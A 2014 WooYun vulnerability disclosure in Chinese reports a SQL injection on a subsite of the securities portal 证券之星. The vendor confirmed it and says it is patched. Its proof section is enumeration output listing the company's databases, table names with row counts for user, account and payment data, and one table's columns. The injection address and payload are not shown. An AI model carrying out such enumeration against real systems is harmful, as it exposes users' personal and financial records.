漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-081237
漏洞标题:证券之星分站存在高危SQL注入(影响用户数据)
相关厂商:证券之星
漏洞作者: 黑暗游侠
提交时间:2014-10-29 18:47
修复时间:2014-12-13 18:48
公开时间:2014-12-13 18:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-10-30: 厂商已经确认,细节仅向厂商公开
2014-11-09: 细节向核心白帽子及相关领域专家公开
2014-11-19: 细节向普通白帽子公开
2014-11-29: 细节向实习白帽子公开
2014-12-13: 细节向公众公开
简要描述:
某大型证券公司分站存在高危SQL注入
详细说明:
证券之星,排行412,权7
旗下分站存在高危SQL注入
http://top.chinaz.com/site_www.stockstar.com.html
漏洞证明:
注射地址:
available databases [6]:
[*] information_schema
[*] win
[*] win5final
[*] win_mall
[*] win_mode
[*] win_subscribe
Database: win_subscribe
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| conclude | 3435424 |
| message | 58381 |
| subLog | 415 |
| subInfo | 286 |
| `user` | 34 |
+---------------------------------------+---------+
Database: win_mall
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| order_address | 7136 |
| order_detail | 7136 |
| user_address | 1488 |
| product_rule | 103 |
| product | 90 |
+---------------------------------------+---------+
Database: win5final
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| deal_snapshot | 369925 |
| stock_snapshot | 87804 |
| snapshot_log | 26051 |
| money_snapshot | 24522 |
| deal_timeline | 9284 |
| stat | 356 |
| assets_settings | 26 |
| accounts | 10 |
+---------------------------------------+---------+
Database: win
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| win_joined | 5621615 |
| win_credit_detail_win5 | 2294239 |
| win_promotion_history | 1408123 |
| win_account_property | 1218050 |
| vir_currency | 1148580 |
| win_join | 872547 |
| win_userbind | 660019 |
| win_vstock | 654768 |
| win_apply | 652437 |
| win_user | 571656 |
| win_apply_info | 571655 |
| win_user_spacehost | 571655 |
| winid | 571655 |
| vir_currency_order | 546332 |
| vir_currency_detail | 542995 |
| win_trade_account | 350436 |
| win_trade_upgrade | 289361 |
| win_trade_account_role | 289251 |
| win_promotion | 213626 |
| win_credit | 172989 |
| win_honor | 75006 |
| win_common_member | 64647 |
| win_credit_detail | 52709 |
| win_common_maillist | 42160 |
| win_common_mailqueue | 42160 |
| win_common_member_digest | 39783 |
| win_mode | 37569 |
| win_capital_log | 23164 |
| win_concerned | 18993 |
| tmp_win_promotion | 16760 |
| win_contract | 13607 |
| attend_record | 13120 |
| del_win_joined_20140811 | 12968 |
| payment_order_detail | 8011 |
| attend_basic | 7407 |
| payment_order | 7086 |
| play_rule_detail | 4050 |
| news | 2177 |
| payment_result | 2105 |
| play_award | 1218 |
| attend_prize | 1212 |
| win_subscribe_code | 1184 |
| play_basic | 470 |
| win_trust | 240 |
| win_ad | 154 |
| win_open_auth | 153 |
| win_text_message | 144 |
| win_feedback | 93 |
| win_trust_message | 89 |
| win_team | 28 |
| dict_detail | 20 |
| rule_dict | 18 |
| win_account_type | 9 |
| play_honour | 8 |
| win_subcode_type | 8 |
| win_trade_role | 6 |
| dict_basic | 1 |
| win_open_appinfo | 1 |
+---------------------------------------+---------+
Database: win_mode
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ticket_audit | 676891 |
| mode_info | 37625 |
| ticket_log | 20989 |
| compulsory_reducation_log | 2700 |
| financing_log | 1177 |
| financing_status | 673 |
| financing_rule | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1176 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| STATISTICS | 229 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| PARTITIONS | 121 |
| TABLES | 121 |
| PROCESSLIST | 120 |
| KEY_COLUMN_USAGE | 106 |
| TABLE_CONSTRAINTS | 96 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| SCHEMA_PRIVILEGES | 19 |
| ENGINES | 9 |
| SCHEMATA | 6 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: win
Table: win_joined
[12 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| accountId | int(11) |
| beginTime | datetime |
| ctime | datetime |
| endTime | datetime |
| id | bigint(20) |
| name | varchar(80) |
| playId | int(11) |
| pNum | smallint(4) |
| rank | int(11) |
| rate | decimal(19,3) |
| teamId | int(11) |
| userId | int(11) |
+-----------+---------------+
修复方案:
过滤
版权声明:转载请注明来源 黑暗游侠@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2014-10-30 10:04
厂商回复:
感谢白帽子辛苦的工作,漏洞已修补。
最新状态:
2014-12-13:已修补